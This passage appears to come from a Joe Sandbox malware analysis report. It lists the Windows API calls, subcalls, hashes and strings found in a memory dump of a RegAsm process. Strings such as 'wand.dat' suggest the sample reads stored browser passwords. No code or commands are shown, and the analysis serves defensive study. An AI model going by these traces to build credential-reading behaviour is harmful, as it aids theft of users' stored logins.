                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                • free.MSVCRT ref: 0040E9D3
                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$free
                                                                • String ID:
                                                                • API String ID: 2241099983-0
                                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                APIs
                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                • malloc.MSVCRT ref: 004174BD
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                • free.MSVCRT ref: 004174E4
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                • String ID:
                                                                • API String ID: 4053608372-0
                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                APIs
                                                                • GetParent.USER32(?), ref: 0040D453
                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$ClientParentPoints
                                                                • String ID:
                                                                • API String ID: 4247780290-0
                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • memset.MSVCRT ref: 004450CD
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                • String ID:
                                                                • API String ID: 1471605966-0
                                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                APIs
                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                • wcscat.MSVCRT ref: 0044476E
                                                                • wcscat.MSVCRT ref: 0044477F
                                                                • wcscat.MSVCRT ref: 0044478E
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                • String ID: \StringFileInfo\
                                                                • API String ID: 102104167-2245444037
                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                APIs
                                                                • memset.MSVCRT ref: 004100FB
                                                                • memset.MSVCRT ref: 00410112
                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                Similarity
                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                • String ID: </%s>
                                                                • API String ID: 3400436232-259020660
                                                                APIs
                                                                • memset.MSVCRT ref: 0040D58D
                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                Similarity
                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                • String ID: caption
                                                                • API String ID: 1523050162-4135340389
                                                                APIs
                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                Similarity
                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                • String ID: MS Sans Serif
                                                                • API String ID: 210187428-168460110
                                                                APIs
                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                Similarity
                                                                • API ID: memcpy$memcmp
                                                                • String ID:
                                                                • API String ID: 3384217055-0
                                                                APIs
                                                                • memset.MSVCRT ref: 0040560C
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                Similarity
                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                • String ID: *.*$dat$wand.dat
                                                                • API String ID: 2618321458-1828844352
                                                                APIs
                                                                • memset.MSVCRT ref: 00412057
                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                Similarity
                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                • String ID:
                                                                • API String ID: 3550944819-0
                                                                APIs
                                                                • free.MSVCRT ref: 0040F561
                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                Similarity
                                                                • API ID: memcpy$free
                                                                • String ID: g4@
                                                                • API String ID: 2888793982-2133833424
                                                                APIs
                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: @
                                                                • API String ID: 3510742995-2766056989
                                                                APIs
                                                                • memset.MSVCRT ref: 004144E7
                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                • memset.MSVCRT ref: 0041451A
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                Similarity
                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                • String ID:
                                                                • API String ID: 1127616056-0
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                • malloc.MSVCRT ref: 00417459
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                • free.MSVCRT ref: 0041747F
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                Similarity
                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                • String ID:
                                                                • API String ID: 2678498856-0
                                                                APIs
                                                                • memset.MSVCRT ref: 0040F673
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                Similarity
                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                • String ID:
                                                                • API String ID: 2754987064-0
                                                                APIs
                                                                • memset.MSVCRT ref: 0040F6E2
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                • strlen.MSVCRT ref: 0040F70D
                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                Similarity
                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                • String ID:
                                                                • API String ID: 2754987064-0
                                                                APIs
                                                                Similarity
                                                                • API ID: wcscpy$CloseHandle
                                                                • String ID: General
                                                                • API String ID: 3722638380-26480598
                                                                APIs
                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                Similarity
                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                • String ID:
                                                                • API String ID: 764393265-0
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                Similarity
                                                                • API ID: Time$System$File$LocalSpecific
                                                                • String ID:
                                                                • API String ID: 979780441-0
                                                                APIs
                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                Similarity
                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                • String ID:
                                                                • API String ID: 1386444988-0
                                                                APIs
                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                Similarity
                                                                • API ID: wcschr$memcpywcslen
                                                                • String ID: "
                                                                • API String ID: 1983396471-123907689
                                                                APIs
                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                Similarity
                                                                • API ID: _snwprintfmemcpy
                                                                • String ID: %2.2X
                                                                • API String ID: 2789212964-323797159
                                                                Similarity
                                                                • API ID: _snwprintf
                                                                • String ID: %%-%d.%ds
                                                                • API String ID: 3988819677-2008345750
                                                                APIs
                                                                • memset.MSVCRT ref: 0040E770
                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                Similarity
                                                                • API ID: MessageSendmemset
                                                                • String ID: F^@
                                                                • API String ID: 568519121-3652327722
                                                                Similarity
                                                                • API ID: PlacementWindowmemset
                                                                • String ID: WinPos
                                                                • API String ID: 4036792311-2823255486
                                                                APIs
                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                • memset.MSVCRT ref: 0042BAAE
                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID:
                                                                • API String ID: 438689982-0
                                                                APIs
                                                                  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                Similarity
                                                                • API ID: ??2@$memset
                                                                • String ID:
                                                                • API String ID: 1860491036-0
                                                                APIs
                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                • free.MSVCRT ref: 0040A908
                                                                • free.MSVCRT ref: 0040A92B
                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                Similarity
                                                                • API ID: free$memcpy$mallocwcslen
                                                                • String ID:
                                                                • API String ID: 726966127-0
                                                                APIs
                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                • free.MSVCRT ref: 0040B201
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                • free.MSVCRT ref: 0040B224
                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                Similarity
                                                                • API ID: free$memcpy$mallocwcslen
                                                                • String ID:
                                                                • API String ID: 726966127-0
                                                                APIs
                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                • free.MSVCRT ref: 0040B0FB
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                • free.MSVCRT ref: 0040B12C
                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                Similarity
                                                                • API ID: free$memcpy$mallocstrlen
                                                                • String ID:
                                                                • API String ID: 3669619086-0
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                • malloc.MSVCRT ref: 00417407
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                • free.MSVCRT ref: 00417425
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0